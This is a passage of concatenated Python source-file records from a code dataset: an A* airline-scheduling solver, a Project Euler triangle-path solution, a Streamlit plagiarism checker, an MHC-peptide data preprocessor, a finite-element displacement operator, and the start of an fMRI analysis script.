new_state)\n\n new_state[0].remove(action[1])\n p = action[0]\n l = action[1]\n new_state[1][0][p] = self.legs[l].get_arr_airport()\n dep = self.legs[l].get_dep_airport()\n arr = self.legs[l].get_arr_airport()\n leg_dur = self.legs[l].get_dur()\n classe = self.planes[p].get_class()\n new_state[1][1][p] = max(new_state[1][1][p] + leg_dur, self.airports[dep][0] + leg_dur, self.airports[arr][0])\n new_state[1][1][p] = new_state[1][1][p] + self.airClasses[classe]\n new_state[1][TIME][p] = new_state[1][TIME][p] + self.airClasses[classe]\n new_state[1][LEGS][p].append(l)\n\n #next_state = tuple(new_state[0]), (tuple(new_state[1][0]), tuple(new_state[1][1]), tuple(tuple(new_state[1][2][i]) for i in range(len(new_state[1][2])) ))\n #needed_info = [[-1 for p in range(len(P))], [0 for p in range(len(P))], [() for i in range(len(P))]]\n #initial = (tuple([l.get_id() for l in self.legs]), tuple(tuple(i) for i in needed_info))\n\n #planes_info = tuple(new_state[1][0]), tuple(new_state[1][1]), tuple(tuple(i) for i in new_state[1][2])\n #planes_info = tuple(new_state[1][0]), tuple(new_state[1][1]), (tuple(new_state[1][2][0]), tuple(new_state[1][2][1]), tuple(new_state[1][2][2]))\n #next_state = (tuple(new_state[0]), planes_info)\n #print(\"Next state: \", next_state)\n return (tuple(new_state[0]), (tuple(new_state[1][0]), tuple(new_state[1][1]), (tuple(new_state[1][2][0]),tuple(new_state[1][2][1]))) )\n\n\n def goal_test(self, state):\n #percorreu todas as legs?\n print(state)\n if state[0] != ():\n return False\n for l in state[1][LEGS]:\n s = len(l)\n\n if s == 0:\n continue\n else:\n first = self.legs[l[0]].get_dep_airport()\n last = self.legs[l[s-1]].get_arr_airport()\n #print(\" initial and final leg: \",l[0], l[s-1])\n if first != last:\n return False\n return True\n\n def path_cost(self, c, state1, action, state2): # path cost g(n)\n profit = self.legs[action[1]].get_profit(self.planes[action[0]].get_class())\n # print(\"profi: \", profit, \"leg \", action[1], \"plane\", self.planes[action[0]].get_class(), \"\\n\")\n return c + 1/profit\n\n def h(self, node): # heuristic function h(n)\n # note: use node.state to access the state\n h = 0\n\n \"\"\"state = node.state\n\n legs = list(state[1][2])\n\n state_list = [list(state[0]), [list(state[1][0]), list(state[1][1]), [legs[i] for i in range(len(legs))]]]\"\"\"\n\n for leg in node.state[0]:\n h = h + 1 / self.legs[leg].get_max_profit()\n #print(leg, self.legs[leg].get_max_profit())\n\n \"\"\"for leg in state_list[0]:\n h = h + 1/self.legs[leg].get_max_profit()\n print(leg, self.legs[leg].get_max_profit())\"\"\"\n\n # print(\" heuristica\",h)\n\n return h\n\n def load(self, fh):\n # note: fh is an opened file object\n # note: self.initial may also be initialized here\n lines = fh.readlines()\n return process(lines)\n\n\n\n def save(self, fh, state):\n i = 0\n profit = 0\n for legs_list in state[1][LEGS]:\n line = \"S \" + self.planes[i].get_name() + \" \"\n for l in legs_list:\n line = line + \" \" + self.legs[l].get_dep_airport() + \" \" + self.legs[l].get_arr_airport()\n c = self.planes[i].get_class()\n profit = profit + self.legs[l].get_profit(c)\n line = line + \"\\n\"\n fh.write(line)\n i = i +1\n line = \"P \" + str(profit)\n fh.write(line)\n\n\n\ndef load_problem(filename):\n with open(filename) as fh:\n lines = fh.readlines()\n return lines\n\n\ndef process(lines):\n A=[]\n P=[]\n L=[]\n C=[]\n\n for ln in lines:\n if ln[0] == 'A':\n A.append([s for s in ln.split() ])\n\n if ln[0] == 'P':\n P.append([s for s in ln.split()])\n\n if ln[0] == 'L':\n L.append([s for s in ln.split()])\n\n if ln[0] == 'C':\n C.append([s for s in ln.split()])\n for a in A:\n a[2] = int(a[2])\n a[3] = int(a[3])\n for l in L:\n l[3] = int(l[3])\n l[5] = int(l[5])\n l[7] = int(l[7])\n for c in C:\n c[2] = int(c[2])\n return [A, P, L, C]\n\n\n\ndef main():\n\n if len(sys.argv) > 1:\n fh = open(\"solution.txt\", \"w+\")\n prob = ASARProblem(sys.argv[1])\n node = astar_search(prob)\n prob.save(fh, node.state)\n else:\n print(\"Usage: %s <filename>\" % (sys.argv[0]))\n\n\nmain()\n\n\n\n\n\n\n\"\"\" puzzle = EightPuzzle((1, 2, 3, 4, 5, 6, 0, 7, 8))\n sol = astar_search(puzzle)\n print(\"parent \", sol.parent, \"state \", sol.state, \"action \", sol.action, \"path cost \", sol.path_cost, \"depth \", sol.depth)\n print(\"grandpa\", sol.parent.parent)\"\"\"\n\n\n","sub_path":"project1/funciona2.py","file_name":"funciona2.py","file_ext":"py","file_size_in_byte":9800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202341153","text":"from math import sqrt\n\ntri = \"\"\"75\n95 64\n17 47 82\n18 35 87 10\n20 04 82 47 65\n19 01 23 75 03 34\n88 02 77 73 07 63 67\n99 65 04 28 06 16 70 92\n41 41 26 56 83 40 80 70 33\n41 48 72 33 47 32 37 16 94 29\n53 71 44 65 25 43 91 52 97 51 14\n70 11 33 28 77 73 17 78 39 68 17 57\n91 71 52 38 17 14 91 43 58 50 27 29 48\n63 66 04 68 89 53 67 30 73 16 69 87 40 31\n04 62 98 27 23 09 70 98 73 93 38 53 60 04 23\"\"\"\n\n\n# 0 -> 1, 2\n# 1 -> 3, 4\n# 2 -> 4, 5\n# 3 -> 6, 7\n# 4 -> 7, 8\n# 5 -> 8, 9\n\n# L + x + 1, L + x + 2\n\n# S = n(n+1)/2 => n^2 + n - 2S = 0 => n = ( -1 +- sqrt(1 + 8S) ) / 2\n\n# L = int((sqrt(8S+1) - 1)/2)\n\n\ndef load_from_string(string):\n L = []\n lines = string.split('\\n')\n for line in lines:\n L += [int(num) for num in line.split(' ')]\n return L\n\ndef get_line_from_index(i):\n return int((sqrt(8*i + 1) - 1) / 2)\n\ndef get_left_child(i):\n return get_line_from_index(i) + i + 1\n\ndef get_right_child(i):\n return get_left_child(i) + 1\n\n# C = L(RP) + RP + 1 = L(C) - 1 + RP + 1 = L(C) + RP ==> RP = C - L(C)\n\ndef right_parent(i):\n line = get_line_from_index(i)\n p = i - line\n if get_line_from_index(p) != (line - 1):\n return None\n return p\n\ndef left_parent(i):\n line = get_line_from_index(i)\n p = i - line - 1\n if p < 0 or get_line_from_index(p) != (line - 1):\n return None\n return p\n\ndef max_paths(L):\n M = [0] * len(L)\n M[0] = L[0]\n\n # fill the triangle at the two extremities\n l = get_left_child(0)\n r = get_right_child(0)\n while r < len(L) and l < len(L):\n M[l] = L[l] + M[right_parent(l)]\n M[r] = L[r] + M[left_parent(r)]\n l = get_left_child(l)\n r = get_right_child(r)\n \n # fill the rest of the triangle\n for i in range(len(L)):\n l = left_parent(i)\n r = right_parent(i)\n if l is not None and r is not None:\n M[i] = L[i] + max(M[l], M[r])\n \n return M\n\ndef test():\n for i in range(10):\n print('Index: {} - LP: {} - RP: {} - LC: {} - RC: {}'.format(i, left_parent(i), right_parent(i), get_left_child(i), get_right_child(i)))\n\n\nL = load_from_string(tri)\n\n# test()\n\n\nM = max_paths(L)\n\ndef max_path_to_bottom(L):\n M = max_paths(L)\n last_line = get_line_from_index(len(L) - 1)\n first_of_last_line = last_line * (last_line + 1) // 2\n m = M[first_of_last_line]\n for i in range(first_of_last_line, len(L)):\n if M[i] > m:\n m = M[i]\n return m\n\nprint(M)\nprint(max_path_to_bottom(L))","sub_path":"problem18.py","file_name":"problem18.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383190972","text":"import streamlit as st\nfrom PIL import Image\nimport pytesseract as pt\nfrom textblob import TextBlob\nimport cv2 as cv\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport os\nimport base64\nimport pandas as pd\nimport time\nfrom pdf2image import convert_from_path\nimport pdfplumber\nimport docx2txt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndef intro():\n st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>Problem Statement</h2>\n <p style='color: #0e1236;'>Plagiarism is defined as taking the work of others as your own without credit. This definition applies to source-lacking essays and simply claiming ideas as your own. \n One example of plagiarism is like taking the idea of the theory of relativity as your own, or claiming you wrote a book while it was actually made by another author.</p>\"\"\",\n unsafe_allow_html=True)\n st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>TASK</h2><p style='color: #0e1236;'>\n Need to Input some files in raw format and then check plagiarism among them</p>\"\"\",\n unsafe_allow_html=True)\n st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>My Approach</h2>\n <p style='color: #0e1236;'>\n <ul style='text-align: left; color: #0e1236;'>\n <li>Create a web Interface using Python</li>\n <li>Take some input files</li>\n <li>Extract Text from them using some of the libraries like docx2txt pdfplumber tesseract etc.</li>\n <li>Compare them using a NLP(Natural Language Processig) or LCS(longest comen Subsequence)</li>\n <li>Classify texts as:<ul><li>Positive if plagiarism is less than 30%,<li>Negative if plagiarism is greater than 75%,<li>Random otherwise</li></ul>\n <li>I am using Streamlit as Backend In this Project Which is an open source app framework</li>\n </ul>\n </p>\"\"\",\n unsafe_allow_html=True)\n st.markdown(\"\"\"<h3 style='text-align: left; color: #0e1236;'>Learn More</h3>\"\"\",\n unsafe_allow_html=True)\n if(st.checkbox(\"What is Tesseract\")):\n st.markdown(\n \"\"\"<div style='background-color: #FEFEFE;padding-left: 50px;border-radius: 10px;'>\n# from textblob import TextBlob\n <h3 style='text-align: left; color: #0e1236;'>An optical character recognition (OCR) engine</h3>\n <p style='text-align: left; color: #0e1236;'>Tesseract is an OCR engine with support for unicode and \n the ability to recognize more than 100 languages out of the box. It can be trained to recognize other languages.</p>\n <p style='text-align: left; color: #0e1236;'>Tesseract is used for text detection on mobile devices, in video, and \n in Gmail image spam detection.</p>\n <a href = \"https://tesseract-ocr.github.io/\" style='text-align: left; color:#7870e0;'>\n Tesseract Documentation\n </a >\n </div><p></p>\"\"\", unsafe_allow_html=True)\n if(st.checkbox(\"Lowest commen Subsequence\")):\n st.markdown(\n \"\"\"<div style='background-color: #FEFEFE;border-radius: 10px;padding-left: 50px;'>\n <p style='text-align: left; color: #0e1236;'><span style='font-style: italic;'>LCS Problem Statement:</span> \n Given two sequences, find the length of longest subsequence present in both of them. A subsequence is a sequence \n that appears in the same relative order, but not necessarily contiguous. For example, “abc”, “abg”, “bdf”, “aeg”, ‘”acefg”, .. etc are subsequences of “abcdefg”.</p>\n <p style='text-align: left; color: #0e1236;'>We are using Dynamic programming for this.</p>\n <a href = \"https://www.geeksforgeeks.org/longest-common-subsequence-dp-4/\" style='text-align: left; color:#7870e0;'>\n Geeks For Geeks Link\n </a >\n </div><p></p>\"\"\",\n unsafe_allow_html=True)\n if(st.checkbox(\"Show Code\")):\n st.markdown(\n \"\"\"<h2 style='text-align: left; color: #0e1236;'>Lowest Commen Subsequence Function</h2>\"\"\",\n unsafe_allow_html=True)\n\n with st.echo():\n def lowestcomensubsequence(X, Y):\n m = len(X)\n n = len(Y)\n\n L = [[None]*(n+1) for i in range(m+1)]\n\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n L[i][j] = 0\n elif X[i-1] == Y[j-1]:\n L[i][j] = L[i-1][j-1]+1\n else:\n L[i][j] = max(L[i-1][j], L[i][j-1])\n\n return L[m][n]\n\n\ndef Extract(fil):\n text = \"\"\n if fil.type == \"text/plain\":\n text = str(fil.read(), \"utf-8\")\n\n elif fil.type == \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\":\n text = docx2txt.process(fil)\n\n elif fil.type == \"application/pdf\":\n with pdfplumber.open(fil) as pdf:\n for j in range(0, len(pdf.pages)):\n page = pdf.pages[j]\n text += page.extract_text()\n else:\n file_bytes = np.asarray(bytearray(fil.read()), dtype=np.uint8)\n img = cv.imdecode(file_bytes, cv.IMREAD_COLOR)\n text = pt.image_to_string(img)\n text = text.replace('\\n', ' ').replace('\\r', '')\n return text\n\n\ndef lcs(X, Y):\n m = len(X)\n n = len(Y)\n\n L = [[None]*(n+1) for i in range(m+1)]\n\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n L[i][j] = 0\n elif X[i-1] == Y[j-1]:\n L[i][j] = L[i-1][j-1]+1\n else:\n L[i][j] = max(L[i-1][j], L[i][j-1])\n\n return L[m][n]*100/max(m, n)\n\n\ndef download_link(object_to_download, download_filename, download_link_text):\n if isinstance(object_to_download, pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=False)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'<a href=\"data:file/txt;base64,{b64}\" download=\"{download_filename}\" style=\"color:#FFF;text-decoration:none;\">{download_link_text}</a>'\n\n\ndef heatmap(x_labels, y_labels, values):\n fig, ax = plt.subplots()\n im = ax.imshow(values)\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(len(x_labels)))\n ax.set_yticks(np.arange(len(y_labels)))\n # and label them with the respective list entries\n ax.set_xticklabels(x_labels)\n ax.set_yticklabels(y_labels)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", fontsize=10,\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n for i in range(len(y_labels)):\n for j in range(len(x_labels)):\n if values[i][j] < 0.5:\n text = ax.text(j, i, \"%.2f\" % values[i, j],\n ha=\"center\", va=\"center\", color=\"w\", fontsize=6)\n else:\n text = ax.text(j, i, \"%.2f\" % values[i, j],\n ha=\"center\", va=\"center\", color=\"b\", fontsize=6)\n st.pyplot(fig)\n\n\ndef OTM():\n MAJOR = st.sidebar.file_uploader(\"MAJOR FILE\", type=[\"pdf\", \"txt\", \"docx\"])\n ALL = st.sidebar.file_uploader(\"ALL FILE\", type=[\"pdf\", \"txt\", \"docx\"],\n accept_multiple_files=True)\n\n if MAJOR is not None and ALL is not None:\n key_val = {}\n for i in range(len(ALL)):\n key_val[ALL[i].name] = i\n corpus = [Extract(ALL[key_val[j]]) for j in sorted(key_val.keys())]\n corpus.append(Extract(MAJOR))\n names = [ALL[key_val[j]].name for j in sorted(key_val.keys())]\n vect = TfidfVectorizer(min_df=1, stop_words=\"english\")\n tfidf = vect.fit_transform(corpus)\n pairwise_similarity = tfidf * tfidf.T\n pairwise_similarity = tfidf * tfidf.T\n pairwise_similarity = pairwise_similarity.toarray()\n l = len(ALL)\n # pairwise_similarity = a * b.T\n\n # print(a.toarray()[0])\n # print(b.toarray())\n # text_major = Extract(MAJOR)\n # key_val = {}\n arr = np.zeros((len(ALL), 1))\n # i = int(0)\n # for fil in ALL:\n # text = Extract(fil)\n # key_val[fil.name] = lcs(text_major, text)\n\n for i in range(l):\n arr[i][0] = pairwise_similarity[l][i]\n chart_data = pd.DataFrame(\n arr,\n columns=[\"Plagiarism\"])\n st.bar_chart(chart_data)\n tmp_download_link = download_link(\n chart_data, 'extracted_text.csv', 'Download as csv')\n st.markdown(f\"\"\"<h3 style='\n border-radius: 10px;color: #FFF;background-color:#eb34c9;text-align: center;'>{tmp_download_link}</h3>\"\"\", unsafe_allow_html=True)\n\n\ndef MTM():\n ALL = None\n ALL = st.sidebar.file_uploader(\"ALL FILE's\", type=[\"pdf\", \"txt\", \"docx\"],\n accept_multiple_files=True)\n if ALL:\n key_val = {}\n for i in range(len(ALL)):\n key_val[ALL[i].name] = i\n corpus = [Extract(ALL[key_val[j]]) for j in sorted(key_val.keys())]\n names = [ALL[key_val[j]].name for j in sorted(key_val.keys())]\n vect = TfidfVectorizer(min_df=1, stop_words=\"english\")\n tfidf = vect.fit_transform(corpus)\n pairwise_similarity = tfidf * tfidf.T\n heatmap(names, names, pairwise_similarity.toarray())\n toprint = pd.DataFrame(pairwise_similarity.toarray())\n tmp_download_link = download_link(\n toprint, 'pairwise_similarity.csv', 'Download as csv')\n st.markdown(f\"\"\"<h3 style='\n border-radius: 10px;color: #FFF;background-color:#eb34c9;text-align: center;'>{tmp_download_link}</h3>\"\"\", unsafe_allow_html=True)\n\n\ndef OTO():\n FILE_1 = st.sidebar.file_uploader(\n \"FILE.1\", type=[\"pdf\", \"txt\", \"docx\", \"jpg\", \"png\", \"jpeg\"])\n FILE_2 = st.sidebar.file_uploader(\n \"FILE.2\", type=[\"pdf\", \"txt\", \"docx\", \"jpg\", \"png\", \"jpeg\"])\n cols0 = st.beta_columns(2)\n if FILE_1 and FILE_2:\n texts = [None, None]\n texts[0] = Extract(FILE_1)\n texts[1] = Extract(FILE_2)\n cols0[0].markdown(f\"<pre style='background-color: #FEFEFE;border-radius: 10px;'>{texts[0]}</pre>\",\n unsafe_allow_html=True)\n cols0[1].markdown(f\"<pre style='background-color: #FEFEFE;border-radius: 10px;'>{texts[1]}</pre>\",\n unsafe_allow_html=True)\n percentage = round(lcs(texts[0], texts[1]), 2)\n k = 2\n if percentage > 75:\n k = 1\n if percentage < 45:\n k = 0\n percentage = str(percentage)\n if k == 0:\n st.markdown(\n f\"\"\"<div style='background-color: #a0f76a;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are Not Copied!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n if k == 1:\n st.markdown(\n f\"\"\"<div style='background-color: #f5af98;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are Copied!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n if k == 2:\n st.markdown(\n f\"\"\"<div style='background-color: #cceaf0;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are somewhat similer!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n\n\ndef main():\n\n # Defining Title\n st.markdown(\n \"<h1 style='text-align: center;border-radius: 10px;color: #FFF;background-color:#eb34c9;padding-top:30px;padding-bottom:30px;font-size:60px;'>Find Plagiarism</h1>\", unsafe_allow_html=True)\n st.markdown(\n \"\"\"<style>body {background-color: #e6e8dc;margin-left:0;}</style><body></body>\"\"\", unsafe_allow_html=True)\n Comparison_Type = ['intro', 'One-to-Many', 'Many-to-Many', 'One-to-One']\n Comparison = st.selectbox(\"Select Comparison Type\", Comparison_Type)\n if Comparison == Comparison_Type[0]:\n intro()\n if Comparison == Comparison_Type[1]:\n OTM()\n elif Comparison == Comparison_Type[2]:\n MTM()\n else:\n OTO()\n\n\nmain()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442778185","text":"import argparse\n\nimport numpy as np\n\nDATA_KEYS = [\"Allele\", \"Peptide\", \"MHC\", \"Binding result\"]\n\ndef write_all_2_file(filename, data, size_limit=10):\n \"\"\"\n Write all formatted data to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n\n\ndef write_peplen9_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if len(entry[1]) == 9:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n\n\ndef write_peplen10_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if len(entry[1]) == 10:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef write_A_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-A' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef write_B_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-B' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef write_C_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-C' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef read_data(file):\n \"\"\"\n Read data from file\n \"\"\"\n data = np.genfromtxt(file,\n dtype='str',\n skip_header=True,\n delimiter=',')\n\n return data\n\n\ndef mhc_data(raw_data):\n \"\"\"\n Parse raw MHC data.\n\n returns tuple of lists: (mhc_name_list, mhc_sequence_list)\n \"\"\"\n print(\"Checking MHC data\")\n mhcs = []\n data = []\n temp_data = []\n for d in raw_data:\n temp_data.append(list(d))\n\n raw_data = temp_data\n\n for d in raw_data:\n # entry = list2string(extract_numeric_sequence(d, index=2))\n entry = d[2]\n # Allele name = index 1\n mhcs.append(d[1])\n data.append(entry)\n\n print(\"Size of data = \" + str(len(raw_data)))\n return (mhcs, data)\n\n\ndef peptide_data(raw_data):\n \"\"\"\n Parse raw peptide data.\n\n returns tuple of lists: (mhc_name_list, peptide_sequence_list, boolean_bindings_list)\n \"\"\"\n print(\"Checking Peptide data\")\n mhc_names = []\n data = []\n bindings = []\n temp_data = []\n for d in raw_data:\n temp_data.append(list(d))\n\n raw_data = temp_data\n for d in raw_data:\n entry = d[0]\n # Only keep peptides of length 9 or 10\n if filter_size(entry, 9) or filter_size(entry, 10):\n entry = d[0]\n data.append(entry)\n # Allele name = index 1\n mhc_names.append(d[2])\n # Append if binding is True or False\n bindings.append(int(d[1] == 'True'))\n\n return (mhc_names, data, bindings)\n\n\ndef filter_size(sequence, size):\n \"\"\"\n Only keep sequence of length @p size.\n \"\"\"\n if len(sequence) == size:\n return sequence\n return None\n\n\ndef get_valid_mhc_names(peptides_tuple, mhcs_tuple):\n \"\"\"\n Get list of MHC names that are also used in experiments with peptides.\n \"\"\"\n # Extract MHC names from peptides and mhcs data.\n mhcs_peptides = peptides_tuple[0]\n mhcs_mhcs = mhcs_tuple[0]\n\n inter_set = set(mhcs_peptides).intersection(set(mhcs_mhcs))\n\n return list(inter_set)\n\n\ndef merge_valid_data(peptides_tuple, mhcs_tuple, valid_mhcs):\n \"\"\"\n Merge the (valid) mhcs with the peptide experiments.\n \"\"\"\n # Get the indices of the peptide experiments that are done with valid MHCs.\n peptides_indices = [index for index, mhc in enumerate(peptides_tuple[0]) if mhc in valid_mhcs]\n\n result = []\n for index in peptides_indices:\n # Create data entry and append to the results\n mhc_name = peptides_tuple[0][index] # MHC name\n full_entry = [\n mhc_name, # MHC name\n peptides_tuple[1][index], # Peptide sequence\n mhcs_tuple[1][mhcs_tuple[0].index(mhc_name)], # MHC sequence\n peptides_tuple[2][index] # Binding result\n ]\n\n result.append(full_entry)\n\n return result\n\n\ndef main(mhc_file, peptide_file):\n \"\"\"\n Main function\n \"\"\"\n # Collect and clean MHC data\n raw_mhc_data = read_data(mhc_file)\n mhcs_tuple = mhc_data(raw_mhc_data)\n\n # Collect and clean experimental peptide data\n raw_binding_data = read_data(peptide_file)\n peptides_tuple = peptide_data(raw_binding_data)\n\n # Drop all useless data\n useful_mhcs = get_valid_mhc_names(peptides_tuple, mhcs_tuple)\n\n # Merge the remaining (valid) data\n training_data = merge_valid_data(peptides_tuple, mhcs_tuple, useful_mhcs)\n\n # Write the data to a file\n # Size limit set to 500k = larger than total data = process all\n write_all_2_file(\"TrainingDataAll.csv\", training_data, 500000)\n # write_peplen10_2_file(\"Peplen10TrialFile.csv\", training_data, 500000)\n # write_peplen9_2_file(\"Peplen9TrialFile.csv\", training_data, 500000)\n # write_A_2_file(\"ATrialFile.csv\", training_data, 500000)\n # write_B_2_file(\"BTrialFile.csv\", training_data, 500000)\n # write_C_2_file(\"CTrialFile.csv\", training_data, 500000)\n\n print(str(len(training_data)) + \" usefull entries found available\")\n","sub_path":"src/preprocess/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197616223","text":"import numpy as np\nimport scipy.sparse as sparse\n\n\nclass LaminateDisplacement(object):\n\n def __init__(self, fem, coords):\n\n self._elements = fem.dof.dof_elements\n self._xtip = coords[0]\n self._ytip = coords[1]\n self._a = fem.a # distance in um\n self._b = fem.b # distance in um\n self._dimension = fem.dof.n_mdof\n \n # Initial values of the operator.\n self._assemble(self._operator_element)\n\n \n def get_operator(self):\n \n return self._opr\n \n \n def _assemble(self, element_func):\n \n num = 20 * len(self._elements)\n row = np.zeros(num)\n col = np.zeros(num) \n val = np.zeros(num)\n ntriplet = 0\n \n for e in self._elements:\n dof = e.mechanical_dof\n ge = element_func(e)\n if ge is not None:\n for ii in range(20):\n row[ntriplet] = 0\n col[ntriplet] = dof[ii]\n val[ntriplet] = ge[0, ii]\n ntriplet += 1\n\n shape = (1, self._dimension)\n self._opr = sparse.coo_matrix((val, (row, col)), shape=shape).tocsr()\n \n \n def _operator_element(self, element):\n \n x0 = element.element.i + 0.5\n y0 = element.element.j + 0.5\n xi = (self._xtip / self._a - 2 * x0) \n eta = (self._ytip / self._b - 2 * y0) \n \n #if (x0 == 29.5 or x0 == 30.5) and (y0 == 59.5):\n # print(xi, eta)\n # print(self._xtip, self._ytip)\n # print(self._xtip - 2 * self._a * x0)\n \n if -1 < xi <= 1 and -1 < eta <= 1:\n xi_sign = np.array([-1, 1, 1, -1])\n eta_sign = np.array([-1, -1, 1, 1])\n n = 0.25 * (1 + xi_sign * xi) * (1 + eta_sign * eta)\n ge = np.array([[0, 0, n[0], 0, 0, 0, 0, n[1], 0, 0, 0, 0, n[2], 0, 0, 0, 0, n[3], 0, 0]])\n return ge\n \n return None\n","sub_path":"microfem/analysis_laminate_displacement.py","file_name":"analysis_laminate_displacement.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168317783","text":"# To suppress warnings\n#!/usr/bin/env python -W ignore::DeprecationWarning\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore')\n### Suppressing the warnings, does not seem to work...\n\n# Import modules\nimport matplotlib as mpl # to fix the runtime error on Mac (i.e. Python not installed as a framework)\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import ion\nimport pandas as pd\nimport os\nimport nilearn as nil\nimport numpy as np\nimport math\nimport gc # to garbage collect unreferenced memory use gc.collect()\nfrom numpy import array\nfrom os.path import join\nfrom nistats.first_level_model import FirstLevelModel, run_glm\nfrom nistats.design_matrix import make_first_level_design_matrix\nfrom nistats.reporting import plot_contrast_matrix\nfrom nistats.reporting import plot_design_matrix\nfrom nistats.reporting import get_clusters_table\nfrom nistats.contrasts import compute_contrast\nfrom nistats.second_level_model import SecondLevelModel\nfrom nilearn.plotting import plot_stat_map, plot_anat, plot_img, show\nfrom nilearn import image, masking\nfrom nilearn.image import math_img\n\n# Run the following analyses\nplot_design = False\nplot_zMap = False\nplot_FPR = False\nplot_FDR = False\nplot_FWER = False\nplot_clusterCorrect = False\nclusterReport = False\nplot_surface = False\npause_analysis = False\nplot_all = True\nmake_mask = True\nmake_mask_plot = False\nsecond_level = True\n\n# Set parameters\nthreshold = 1.96 # threshold for the localizer masks as well as plotting // for t contrast = 2.3 and z contrast = 1.96 for p = .05\nt_r = 0.7 # Repetition rate\n\n# Set paths and create folders\nderDataFolder = '/Users/michlf/NRoST_analysis/derivatives/'\nrawDataFolder = 